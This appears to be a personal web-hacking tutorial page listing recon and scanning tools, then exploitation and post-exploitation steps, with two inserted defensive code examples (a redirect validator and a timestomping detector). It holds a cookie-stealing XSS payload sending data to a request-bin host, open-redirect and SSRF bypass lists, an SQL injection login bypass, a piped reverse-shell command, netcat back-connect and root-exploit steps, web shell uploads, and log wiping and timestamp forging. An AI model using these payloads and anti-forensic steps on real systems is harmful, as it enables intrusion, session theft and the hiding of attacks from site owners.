Disclaimer: This tutorial is just for educational purposes. I am not responsible for any of your shit.
I made this page just to save links, URLs and commands so that I can get them easily whenever I need them. This might not be useful for others.
1) Basic lookup (host, nslookup, traceroute, dnsrecon -d <domain> -t axfr, dig @1.1.1.1 <domain> ANY/NS/MX, whois)
https://www.whois.com/whois/site.com
https://crt.sh/ (dnsdumpster.com)
2) Detecting CMS (whatweb)
The Wappalyzer addon can be used for this purpose (BuiltWith)
(https://whatcms.org/?s=site.com)
4) Detecting theme (for WordPress)
5) Detecting websites in the same web server
Obtain the target's IP from nmap or from here and use the IP here. If you could not hack into the target with the steps mentioned here, you can use Bing to search for vulnerable sites on the same server and attack the target using a symlink. Search dork example for an SQL-vulnerable site: ip:69.195.124.112 .php?id=
6) Check GitHub repositories, Google dorks and web archives.
1) Checking robots.txt / sitemap.xml
2) Quick Site scan (netcraft.com)
https://sitecheck.sucuri.net/results/site.com
3) Checking for open ports, OS detection and more
nmap -v -A -T4 site.com
nmap -sV -sC site.com (-sS -F -oN out.txt)
4) Scanning subdomains (fierce --domain, knockpy)
Use Sublist3r
(python3 sublist3r.py -d site.com)
5) Scanning directories (wfuzz)
Use dirb as dirb http(s)://site.com
6) Scanning admin panel
Use Admin-finder or breacher
python3 admin-finder.py -w wordlist.txt -u site.com
python breacher.py -u site.com
Try default passwords (admin, password, user, pass) and SQLi in the admin panel ('or 1 = 1 limit 1 - - + OR '= "or')
7) Scanning Web Application Firewall (WAF)
Use wafw00f
python setup.py install
wafw00f https://site.com
8) Overall Scan
nikto -url site.com
This part is best done manually by browsing the site and checking the features available. Many tools exist for this step, but they are not recommended because they only follow a fixed set of instructions; you can still use them to save time.
Checking for subdomain takeover vulnerability
Use this site to check for subdomain takeover vulnerabilities.
Checking for vulnerabilities in WordPress
Use wpscan (cmsmap)
wpscan --url site.com -v -e vp,vt
wpscan --url site.com --enumerate at,ap,u
Scan for multiple vulnerabilities
Use WAScan
python wascan.py --url http(s)://site.com --scan 5
Use w3af (reference: http://docs.w3af.org/en )
Installation:
The easiest way to install w3af in Kali is:
apt-get update
apt-get install -y w3af
This will install the latest packaged version, which might not be the latest available from our repositories. If the latest version is needed these steps are recommended:
cd ~
apt-get update
apt-get install -y python-pip w3af
pip install --upgrade pip
git clone https://github.com/andresriancho/w3af.git
cd w3af
./w3af_console
. /tmp/w3af_dependency_install.sh
Starting scan:
w3af>>> target
w3af/config:target>>> set target http://localhost/
w3af/config:target>>> back
w3af>>>
Finally, run start in order to run all the configured plugins.
w3af>>> start
Check for existing exploits in sites (sn1per -t, amass [enum]/[intel whois] -dir <folder to store logs> -d <domain>)
Use XAttacker
perl XAttacker.pl
Check for open redirect
www.whitelisted.com.evil.com
//google.com or /\google.com
https:google.com
\/\/google.com/ OR /\/google.com/
//google%E3%80%82com
//google%00.com
?next=whitelisted.com&next=google.com
http://www.theirsite.com@yoursite.com/
XSS
The most dangerous attack that can be done by exploiting XSS is account takeover by stealing the session cookie. Example payload:
<script>new Image().src="https://hookb.in/RZe7DaG8KkFREEj72Vyo?c="+document.cookie</script>
onfocus="fetch('REQUESTBINURL/?'+localStorage.getItem('token'))" autofocus
?url=http://safesite.com&site.com
?url=http://////////////site.com/
?url=http://site@com/account/edit.aspx
?url=http://site.com/account/edit.aspx
?url=http://safesite.com?.site.com
?url=http://safesite.com#.site.com
?url=http://safesite.com\.site.com/domain
?url=https://ⓈⒾⓉⒺ.ⓒⓞⓜ = site.com
?url=https://192.10.10.3/
?url=https://192.10.10.2?.192.10.10.3/
?url=https://192.10.10.2#.192.10.10.3/
?url=https://192.10.10.2\.192.10.10.3/
?url=http://127.0.0.1/status/
?url=http://localhost:8000/status/
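Every bypass in the open redirect list above and in the ?url= list that follows the XSS section targets a validator that does substring, prefix or suffix matching on the redirect target. The following is an added example (not from the original notes) of a server-side validator that parses the target and allows only a same-site path or an exact allow-listed host; the allow-list hosts are constructed for the example.

```python
from urllib.parse import urlsplit, unquote

# Constructed allow-list for this example: hosts a redirect may legitimately target.
ALLOWED_HOSTS = frozenset({"whitelisted.com", "safesite.com"})


def is_safe_redirect(raw, allowed=ALLOWED_HOSTS):
    """Return True only for a same-site path or an absolute URL whose host is
    exactly on the allow-list. Each check defuses one bypass family from the list above."""
    if not isinstance(raw, str):
        return False
    s = unquote(raw).strip()                # decode %2F, %00, %E3%80%82 before inspecting
    if "\x00" in s:                         # //google%00.com: embedded NUL
        return False
    # Scheme-relative and backslash forms (//google.com, /\google.com, \/\/google.com):
    # browsers treat "\" as "/" and "//host" as an absolute URL.
    if s.startswith(("//", "/\\", "\\/", "\\\\")):
        return False
    try:
        parts = urlsplit(s)
    except ValueError:                      # urlsplit rejects some confusable Unicode authorities
        return False
    if s.startswith("/"):
        # Plain same-site path: must carry no scheme or authority.
        return parts.scheme == "" and parts.netloc == ""
    if parts.scheme not in ("http", "https"):
        return False                        # bare "evil.com" and "https:google.com" (no authority)
    host = parts.hostname                   # lowercased host, without userinfo or port
    if host is None:
        return False                        # http://////site.com/ leaves an empty authority
    if "@" in parts.netloc:
        return False                        # http://www.theirsite.com@yoursite.com/
    if not host.isascii():
        return False                        # ⓈⒾⓉⒺ.ⓒⓞⓜ and google。com look-alikes
    return host in allowed                  # exact match: whitelisted.com.evil.com fails


def triage(candidates):
    """Map each candidate redirect target to its verdict, for reviewing a batch of log values."""
    return {c: is_safe_redirect(c) for c in candidates}
```

Read exactly one value of the redirect parameter before calling this (the ?next=whitelisted.com&next=google.com trick relies on the validator and the redirect code picking different copies).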
After these steps, you should be able to find at least one vulnerability in the target site. Exploit the vulnerability; some will give you access to the site. If you didn't find any, I suggest checking for vulnerabilities manually using cheat sheets such as this one. I strongly suggest reading the contents of infosecmatter.com, mavericknerd.github.io, book.hacktricks.xyz, securityidiots.com and the gowsunder gitbook.
After gaining access, to maintain access to the site we usually upload a shell and work through it. The shell can be a simple file uploader like this or this, or a complex one like this. You can find many on the internet. Note that not every vulnerability gives you access to the site.
You can't get full control over the target until you get root. So go through this tutorial on how to root a server; here is a quick overview.
First, you need to understand that you can root the server only if it is vulnerable.
1) First, note the kernel version of the server. You can see it in the shell's uname output or run "uname -a" to find it. For example: Linux 2.6.18
2) Now find a local root exploit. If the server is vulnerable, you will find it on sites like Exploit-DB, Packet Storm, vfocus, injector, etc.
3) Now go to the back connect option in the shell. Enter your public IP address in SERVER, the port you want to connect on, and finally connect. If you don't want to use your public IP, run ngrok tcp 123, ping tcp.ngrok.io, and use the IP from ping and the port from ngrok.
4) Now you should receive the back connect with a tool named netcat.
Spawn the shell using python -c 'import pty; pty.spawn("/bin/sh")' OR python3 -c 'import pty; pty.spawn("/bin/bash")' [curl https://reverse-shell.sh/1.1.1.1:3000 | bash ]
Host the local root exploit and make it accessible: python -m SimpleHTTPServer 80
wget [the link of the local root exploit]
Run the exploit
After the exploit works, check your id: uid=0(root) gid=0(root) groups=0(root)
Getting UID=0 means you have root privileges and can do a variety of things (almost everything) on the remote server.
Use LinEnum, linpeas or PrivEsc scripts
Try to exploit it yourself; these commands may help:
sudo -l
find / -perm /4000 -print 2>/dev/null (https://gtfobins.github.io)
ps
Get more commands from here or here.
For Windows, try brute-forcing with credentials obtained from the AutoLogon registry settings:
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
Every login and every activity, such as creating directories, is saved as a log on the web server. You have to delete all those logs.
touch -a -m -t 202208181055.30 o.php
history -c
find . -name "*.log"
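The touch -a -m -t command above rewrites a file's access and modification times, but it cannot set the inode change time (ctime), which the kernel always bumps to "now". That gap is what a defender looks for; the following is an added detection example (not from the original notes) that walks a web root and flags files whose ctime is far newer than their mtime, using a constructed sample directory with one back-dated file.

```python
import os
import tempfile
import time
from pathlib import Path


def find_timestomped(root, min_gap_seconds=3600):
    """Return [(path, mtime, ctime)] for regular files whose inode change time
    is more than min_gap_seconds newer than their content modification time.
    touch -a -m -t rewrites atime/mtime, but the kernel sets ctime to the current
    time, so a freshly back-dated file shows mtime far behind ctime."""
    hits = []
    for p in Path(root).rglob("*"):
        if p.is_symlink() or not p.is_file():
            continue
        st = p.stat()
        if st.st_ctime - st.st_mtime > min_gap_seconds:
            hits.append((str(p), st.st_mtime, st.st_ctime))
    return hits


def build_sample_webroot():
    """Constructed sample: a web root with one normal file and one whose timestamps
    were back-dated exactly as the touch command above does. Returns (root, backdated_path)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    normal = Path(root, "index.php")
    normal.write_text("<?php echo 'hello'; ?>\n")
    stomped = Path(root, "uploads", "o.php")
    stomped.parent.mkdir()
    stomped.write_text("<?php /* constructed sample */ ?>\n")
    # 202208181055.30 from the touch example: 2022-08-18 10:55:30 local time
    old = time.mktime((2022, 8, 18, 10, 55, 30, 0, 0, -1))
    os.utime(stomped, (old, old))          # same effect as touch -a -m -t 202208181055.30
    return root, str(stomped)


if __name__ == "__main__":
    root, _ = build_sample_webroot()
    for path, mtime, ctime in find_timestomped(root):
        print(f"{path}: mtime={time.ctime(mtime)} ctime={time.ctime(ctime)}")
```

chmod, chown and rename also update ctime without touching mtime, so treat hits as leads to correlate with web server access logs rather than as proof of tampering.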
-->Checklist: https://pentestbook.six2dez.com/others/web-checklist
--> Look for SSRF bugs in file downloader, video downloader, image downloader websites.
--> Register on HackerOne and find bugs on US Department of Defense websites; it is easy. You won't get a bounty from the US DoD, only points. Then you will get private invitations on HackerOne where very few invited people hunt for bugs. Try finding bugs in Dutch government websites to get an awesome T-shirt as a reward.
--> Look for IDOR or logical bugs rather than other kinds.
--> Learning resources: infosecmatter.com, mavericknerd.github.io, book.hacktricks.xyz, securityidiots.com and gowsunder gitbook.
--> Check disclosed bug submissions on HackerOne. Follow https://twitter.com/disclosedh1 on Twitter.
--> Don't just learn to hack; hack to learn. Play CTFs and learn from write-ups. You know what's the best way to learn a certain vulnerability? https://ctftime.org/tasks/?tags=vulnerability_name_like_ssrf
Go to https://ctftime.org/calendar/, participate in CTFs, and read the event write-ups from the event page after the CTF is over.
Check these write-ups too: https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
-->Tips Gathered from Internet:
https://www.facebook.com/photo?fbid=1152993915068525&set=pcb.1440104806174528
Cr. Hack Training: